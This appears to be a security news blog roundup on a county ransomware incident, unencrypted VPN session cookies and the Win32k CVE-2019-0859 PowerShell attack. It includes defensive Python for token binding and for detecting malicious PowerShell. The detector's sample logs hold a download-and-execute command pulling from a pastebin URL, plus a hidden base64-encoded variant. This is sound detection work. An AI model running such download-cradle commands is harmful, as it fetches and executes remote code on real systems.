This week’s security snacks:
- Ransomware, Still Making Headlines and Leaving Tears
- Virtual Not-So-Private Network
- Use After Free Vulnerability – Another PowerShell Fileless Attack and the New Urgent Windows CVE
Ransomware, Still Making Headlines and Leaving Tears
Garfield County, Utah, becomes the latest local government to be hit in the US by the scourge that is ransomware.
Unfortunately, most of us will know, or will know someone, who has been impacted by ransomware, maybe even a relative. The number of incidents does seem to be on the decline; however, this could simply be down to a lack of disclosure that such an incident occurred in the first place. Garfield County found their IT systems in this precarious situation earlier this year, with some details only emerging now.
In what is a continuing trend, local governments, hospitals, and police departments have been falling prey to what appear to be targeted attacks. In this incident, the county paid the ransom in order to regain access to their files. No details on the cost to the county have been disclosed. However, in a separate incident in Jackson County, Georgia, the local county ended up paying a reported $400K for the privilege.
The advice out there is both simple and complex, depending on how you look at it. It boils down to local endpoint security, user education, advanced threat detection, application of security baselines, patch management and, most importantly, a backup solution that cannot be compromised locally.
Having witnessed SamSam attacks firsthand, I can tell you it is not a pretty sight when every screen is showing a bitcoin demand. Ramp up protection, patch systems, and test your backup/restore processes.
More information on the Utah incident can be found in the Security Week article titled, Utah County Struck by Ransomware.
Virtual Not-So-Private Network
The US Department of Homeland Security (DHS) cyber security team revealed that a number of VPN providers fail to ensure that their cookies are encrypted. This failure creates a massive hole in security.
We have all seen the adverts on TV promising enhanced security when on public WiFi. Most of us have used a VPN at one point or another, typically to connect back to the office. VPNs have been around for many years and of course are meant to be fundamentally safe, offering a secured, encrypted means of connecting to the file server, an internal app, and other internal company resources. But what happens when your VPN service provider fails to encrypt your session cookies? Oops.
This issue of unencrypted session cookies has been discovered in products from a number of manufacturers and service providers. What does this mean? Well, basically, if the user's account becomes compromised and a hacker obtains this information, they could potentially simply replay the session details. This would allow them to gain access to the protected resources, and best of all, all in your name.
Several manufacturers have moved to address this issue, so the suggestion is that you check your firmware revisions and settings to ensure your virtual private network does not become a virtual public network.
The Register has more information on this in their article with the rather long title, US-Cert alert! Thanks to a massive bug, VPN now stands for ‘Vigorously Pwned Nodes’.
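The firmware fix addresses how the client stores the cookie; the other half of the defence is making a leaked session cookie worth as little as possible. The following is an added example (not code from the original post or from any VPN vendor) of how a gateway can bind a session token to the connecting client and give it a short lifetime, so that a copied token replayed from a different client, or after expiry, is refused. The `client_fingerprint` inputs (a client certificate thumbprint and source IP), the key, and the 600-second lifetime are constructed assumptions for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret and lifetime (assumption): a real gateway would keep
# the key in protected storage and choose the lifetime to match its session policy.
SERVER_KEY = secrets.token_bytes(32)
SESSION_TTL = 600  # seconds


def client_fingerprint(client_cert_thumbprint: str, client_ip: str) -> str:
    """Derive the binding value from attributes the gateway already sees (constructed choice)."""
    return hashlib.sha256(f"{client_cert_thumbprint}|{client_ip}".encode()).hexdigest()


def issue_token(user: str, fingerprint: str, now: int, key: bytes = SERVER_KEY) -> str:
    """Issue a session token whose payload is authenticated with an HMAC over user, binding and expiry."""
    expires = int(now) + SESSION_TTL
    payload = f"{user}|{fingerprint}|{expires}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def validate_token(token: str, fingerprint: str, now: int, key: bytes = SERVER_KEY):
    """Return (True, user) for a valid token, else (False, reason).

    Checks run in this order: structure, signature (so nothing below trusts unsigned
    data), expiry, and finally the binding to the presenting client.
    """
    try:
        user, bound_fp, expires_s, tag = token.split("|")
        expires = int(expires_s)
    except ValueError:
        return False, "malformed"
    payload = f"{user}|{bound_fp}|{expires}"
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return False, "bad signature"
    if now >= expires:
        return False, "expired"
    if not hmac.compare_digest(bound_fp.encode(), fingerprint.encode()):
        return False, "fingerprint mismatch"
    return True, user


def demo():
    """Exercise the four outcomes with constructed inputs and a fixed clock."""
    key = b"constructed-demo-key-do-not-reuse"
    t0 = 1_000_000
    fp_laptop = client_fingerprint("AA:BB:CC", "203.0.113.10")   # the legitimate client
    fp_other = client_fingerprint("AA:BB:CC", "198.51.100.7")    # same cert, different origin
    token = issue_token("alice", fp_laptop, t0, key)
    tampered = token.replace("alice", "admin", 1)                # edit the payload, keep the tag
    return {
        "legit": validate_token(token, fp_laptop, t0 + 100, key),
        "replayed_elsewhere": validate_token(token, fp_other, t0 + 100, key),
        "stale": validate_token(token, fp_laptop, t0 + SESSION_TTL + 1, key),
        "tampered": validate_token(tampered, fp_laptop, t0 + 100, key),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>20}: {result}")
```

Binding to the source IP is the simplest anchor but will break for roaming clients; a client certificate thumbprint or device identity is the more robust choice. Either way, this limits the damage from a cookie that has already leaked; it does not replace the vendor fix for the insecure storage itself.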
Use After Free Vulnerability – Another PowerShell Fileless Attack and the New Urgent Windows CVE
Another snack, another patch. CVE-2019-0859 outlines the details of a security issue being called a “use after free” vulnerability, which allows full control of your system.
Patched this month, Microsoft’s CVE-2019-0859 security notice outlines a process being used in the wild to gain full remote control of an infected system. The process starts with a memory hook and a function ID contained within Win32k.sys. The vulnerability allows control over an allocated memory block. Following this, an exploit can launch a two-stage PowerShell attack, with a PowerShell script being downloaded from Pastebin.
Once the PowerShell scripts have run, a fully functional HTTP-based shell is established, offering full control of the compromised system. This is of course not the first time we have seen PowerShell used in this style of fileless attack. Security firms are estimating four-figure growth over the attacks seen in 2017.
For more information, see the securelist.com article titled, New zero-day vulnerability CVE-2019-0859 in win32k.sys.
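Because the second stage lives only in PowerShell, the place to catch it is script-block logging rather than the file system. The following is an added example (not code from the original post or from the securelist analysis) of detection logic run over constructed log lines: it flags script blocks that combine a download cradle with `Invoke-Expression`, that reference a paste site, or that hide the same behaviour behind `-EncodedCommand`, which it decodes and rescans. The one-line-per-event layout, hostnames, user names and the pastebin-style URL are all constructed for the demo; real telemetry (for example Windows event 4104) would need its own parser in front of `analyze`.

```python
import base64
import re
from dataclasses import dataclass

# Constructed sample: "timestamp host user | scriptblock". Line 3 carries a base64
# UTF-16LE encoded command, built here so the decoder has realistic input.
ENCODED_STAGE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')".encode("utf-16le")
).decode()

SAMPLE_LOGS = [
    "2019-04-15T10:02:11 WS01 jdoe | Get-ChildItem C:\\Users\\jdoe\\Documents",
    "2019-04-15T10:03:40 WS01 jdoe | IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')",
    f"2019-04-15T10:03:42 WS01 jdoe | powershell -nop -w hidden -enc {ENCODED_STAGE}",
    "2019-04-15T10:05:00 WS02 svc_backup | Import-Module ActiveDirectory",
    "2019-04-15T10:06:13 WS02 svc_backup | Invoke-WebRequest -Uri https://intranet.example.internal/status.json",
]

# Individual indicators; none is conclusive on its own (an Invoke-WebRequest to an
# intranet endpoint is everyday administration), so is_suspicious combines them.
INDICATORS = {
    "download_cradle": re.compile(r"(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b)", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "paste_site": re.compile(r"pastebin\.com", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}


@dataclass
class Finding:
    line_no: int
    host: str
    user: str
    indicators: list


def decode_encoded_command(block: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE), or '' if absent or undecodable."""
    m = INDICATORS["encoded_command"].search(block)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def is_suspicious(hits) -> bool:
    """Combine indicators: paste site, cradle+IEX, or an encoded command launched hidden."""
    names = {h.split(":", 1)[-1] for h in hits}  # strip the "decoded:" prefix
    return (
        "paste_site" in names
        or ("download_cradle" in names and "invoke_expression" in names)
        or ("encoded_command" in names and "hidden_window" in names)
    )


def analyze(lines):
    """Scan script-block log lines and return a Finding for each suspicious one."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        meta, _, block = line.partition(" | ")
        _, host, user = meta.split()[:3]
        hits = [name for name, rx in INDICATORS.items() if rx.search(block)]
        decoded = decode_encoded_command(block)
        if decoded:  # rescan the decoded payload and label those hits separately
            hits += ["decoded:" + name for name, rx in INDICATORS.items()
                     if name != "encoded_command" and rx.search(decoded)]
        if is_suspicious(hits):
            findings.append(Finding(line_no, host, user, hits))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"line {f.line_no} {f.host}/{f.user}: {', '.join(f.indicators)}")
```

On the sample above only lines 2 and 3 are reported; line 5 shows why a lone download cradle should not fire by itself. The decode step matters because an encoded command carries none of the plaintext indicators, so a rule that inspects only the raw command line misses exactly the variant attackers prefer.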